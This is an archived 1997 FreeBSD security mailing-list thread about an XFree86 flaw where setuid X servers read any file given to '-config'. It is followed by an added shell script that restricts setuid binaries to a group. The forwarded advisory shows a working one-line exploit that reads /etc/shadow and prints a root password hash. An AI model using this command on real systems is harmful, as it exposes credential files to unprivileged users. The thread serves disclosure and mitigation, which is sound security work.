Date:      Sun, 23 Nov 1997 13:20:20 -0500 (EST)
From:      spork <spork@super-g.com>
To:        David Dawes <dawes@rf900.physics.usyd.edu.au>
Cc:        Philippe Regnauld <regnauld@deepo.prosa.dk>, freebsd-security@FreeBSD.ORG
Subject:   Re: Fwd: "XFree86 insecurity" <root@SHEGG.RH1.IIT.EDU>
Message-ID:  <Pine.BSF.3.96.971123131801.1101A-100000@super-g.inch.com>
In-Reply-To: <19971122192453.17451@rf900.physics.usyd.edu.au>

A quick fix I already had in place from the old xterm exploits was to put
all the people that use X (well, just me) in a group and make the X
binaries with suid bits only executable by that group rather than
world-execute.  While it's not truly a fix, it does limit your
vulnerability.  I've yet to play with XDM...

Charles Sprickman
spork@super-g.com
---- 
                           "I'm not a prophet or a stone-age man
                           Just a mortal with potential of a superman
                           I'm living on"      -DB

On Sat, 22 Nov 1997, David Dawes wrote:

> On Sat, Nov 22, 1997 at 08:23:50AM +0100, Philippe Regnauld wrote:
> 
> We (XFree86) are aware of this one.  I agree with the recommendation of
> removing the setuid bit and using xdm to start the Xserver, and if you
> have XFree86 on a machine where this problem is significant, you should
> consider doing this.
> 
> The fix is to disable the '-config' Xserver option.  This will be removed
> in our next release, and also in the next X11 release from The Open
> Group.  It was only added to get around problems on OS's with small
> command line length limits, and should never have been enabled for most
> Unix-like OSs.  The problem isn't XFree86-specific.  It affects any
> platform using X11R6 XC/TOG code where the Xserver is installed setuid
> root (although on non-XFree86 platforms you may need to be a little more
> inventive with the use of the -config option).
> 
> David
> 
> >Cute one.
> >
> >-----Forwarded message from shegget <root@SHEGG.RH1.IIT.EDU>-----
> >
> >Date:         Fri, 21 Nov 1997 18:35:36 +0000
> >From: shegget <root@SHEGG.RH1.IIT.EDU>
> >Subject:      XFree86 insecurity
> >To: BUGTRAQ@NETSPACE.ORG
> >
> >                  plaguez security advisory n.10
> >
> >                        XFree86 insecurity
> >
> >
> >
> >
> >Program:   XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)
> >
> >Version:   Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
> >           Other versions as well.
> >
> >OS:        All
> >
> >Impact:    The XFree86 servers let you specify an alternate configuration
> >           file and do not check whether you have rights to read it.
> >           Any user can read files with root permissions.
> >
> >
> >
> >
> >hello,
> >just a short one to tell you about this "feature" I found in all default
> >XFree86 servers...
> >
> >
> >Here it is:
> >
> >Script started on Sat Aug 23 15:32:36 1997
> >Loading /usr/lib/kbd/keytables/fr-latin1.map
> >[plaguez@plaguez plaguez]$ uname -a
> >Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
> >[plaguez@plaguez plaguez]$ ls -al /etc/shadow
> >-rw-------   1 root     bin          1039 Aug 21 20:12  /etc/shadow
> >[plaguez@plaguez bin]$ id
> >uid=502(plaguez) gid=500(users) groups=500(users)
> >[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
> >[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
> >Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
> >use: X [:<display>] [option]
> >-a #                   mouse acceleration (pixels)
> >-ac                    disable access control restrictions
> >-audit int             set audit trail level
> >-auth file             select authorization file
> >bc                     enable bug compatibility
> >-bs                    disable any backing store support
> >-c                     turns off key-click
> >
> >... and so on.  HINT: look at the first XF86_SVGA output line.
> >
> >
> >
> >
> >
> >Patch:
> >------
> >
> >If you run xdm, you should consider removing the setuid bit of the
> >servers.
> >
> >If not, well, wait for the XFree86 Project to bring you a patch, since I'm
> >too lazy to find and fix it.
> >
> >
> >
> >
> >
> >later,
> >
> >-plaguez
> >dube0866@eurobretagne.fr
> >
> >-----End of forwarded message-----
> >
> >-- 
> >                                                              -- Phil
> >
> > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
> 
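The group-restriction workaround Charles Sprickman describes above (setuid X binaries executable only by a group of X users, not by the world) can be audited and applied with a small POSIX shell script. The following is an added example, not code from the thread, from XFree86 or from the FreeBSD project; the group name `xusers` and the scratch-directory usage are assumptions, and the real servers live in `/usr/X11R6/bin` as shown in the advisory. The audit reads the mode string from `ls -l` rather than `stat`, so it behaves the same on BSD and GNU userlands.

```shell
#!/bin/sh
# Added example (not from the thread): find setuid binaries that any user may
# execute, and restrict them so only one group can run them. This narrows who
# can reach the setuid server's vulnerable -config code path; it is a
# containment step, not a fix for the server itself.

# Print every setuid file in DIR that is also executable by "other".
# Column 10 of `ls -ld` is the world-execute bit: 'x' or 't' means executable,
# '-' or 'T' means not.
list_world_exec_suid() {
    dir="$1"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        [ -u "$f" ] || continue                 # no setuid bit: not of interest
        other_x=$(ls -ld "$f" | cut -c10)
        case "$other_x" in
            x|t) echo "$f" ;;
        esac
    done
}

# Number of offenders in DIR, convenient as an exit status for a periodic check.
count_world_exec_suid() {
    list_world_exec_suid "$1" | wc -l | tr -d ' '
}

# Move every setuid file in DIR into GROUP and set mode 4710: setuid stays on,
# the owner keeps rwx, members of GROUP may only execute, everyone else has no
# access at all (they cannot even read the binary).
restrict_suid_to_group() {
    dir="$1"; group="$2"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        [ -u "$f" ] || continue
        chgrp "$group" "$f"
        chmod 4710 "$f"
    done
}

# Walk-through against a constructed scratch directory instead of the live system
# (group name "xusers" is assumed; on a real host create it and add the X users):
#   XBIN=$(mktemp -d); touch "$XBIN/XF86_SVGA"; chmod 4755 "$XBIN/XF86_SVGA"
#   list_world_exec_suid "$XBIN"            # prints $XBIN/XF86_SVGA
#   restrict_suid_to_group "$XBIN" xusers
#   list_world_exec_suid "$XBIN"            # prints nothing
```

Run `list_world_exec_suid /usr/X11R6/bin` first to see what would be touched, then `restrict_suid_to_group /usr/X11R6/bin xusers` as root once the group exists. Mode 4710 removes world read as well as world execute, which is deliberate: a user outside the group gains nothing from the binary. Dropping the setuid bit entirely and starting the server from xdm, as David Dawes recommends, remains the stronger option where it is workable.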